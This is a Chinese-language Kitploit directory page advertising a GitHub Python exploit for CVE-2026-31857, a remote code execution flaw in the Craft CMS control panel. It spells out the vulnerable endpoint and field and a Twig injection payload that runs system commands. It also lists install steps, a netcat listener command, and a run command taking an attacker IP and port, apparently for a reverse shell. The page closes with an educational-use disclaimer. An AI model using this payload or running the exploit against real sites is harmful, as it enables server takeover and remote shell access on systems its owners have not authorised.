Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31857 — Craft CMS 控制面板中通过关系条件实现 RCE | Kitploit
工具/GitHubGitHub/0xtatsuki/cve-2026-31857
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试红队远程访问工具Payload 开发
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS 控制面板中通过关系条件实现 RCE

1天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2026-31857 - Craft CMS RCE 漏洞利用

针对 Craft CMS 管理面板中 RCE 漏洞的 Python 漏洞利用程序,通过 admin/actions/element-indexes/count-elements 端点触发。 注入通过 RelatedToConditionRule 条件的 elementIds 字段进行,该字段在服务端被解释为 Twig,并通过 system 过滤器滥用执行任意命令({{[['<cmd>']|filter('system')]}})。

漏洞由 NeoSprings 披露

受影响版本:

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

参考:

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

安装

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

使用方法

  1. 在运行漏洞利用程序之前启动监听器:
$ nc -lvnp <attacker_port>
  1. 运行漏洞利用程序:
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

免责声明

本工具仅供教育目的和授权演练使用(CTF、合同渗透测试或本地测试)。 未经明确授权对任何系统使用本工具均属违法行为。

下载工具